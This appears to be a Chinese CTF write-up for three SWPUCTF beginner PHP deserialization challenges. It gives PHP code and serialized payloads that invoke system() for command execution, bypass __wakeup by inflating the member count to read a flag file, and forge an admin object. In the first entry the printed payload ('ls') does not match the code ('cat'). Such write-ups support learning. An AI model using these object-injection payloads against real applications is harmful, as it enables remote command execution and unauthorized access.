[SWPUCTF 2022 新生赛]1z_unserialize
将$a赋值为system,$this->lly可以赋值为任意命令
构造代码
<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt="system";
public $lly="cat";
}
$demo = new lyh();
echo serialize($demo);
输出结果
O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:2:"ls";}
[SWPUCTF 2022 新生赛]ez_ez_unserialize
构造
<?php
class X
{
public $x = 'fllllllag.php';
}
$a=new X;
echo serialize($a);
?>
得到:O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
由于要绕过wakeup函数,只要序列化中的成员数大于实际成员数,即可绕过
O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
[SWPUCTF 2021 新生赛]ez_unserialize
<?php
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd = "ctf";
}
}
$a=new wllm();
$b=serialize($a);
echo $b;
?>
得到O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}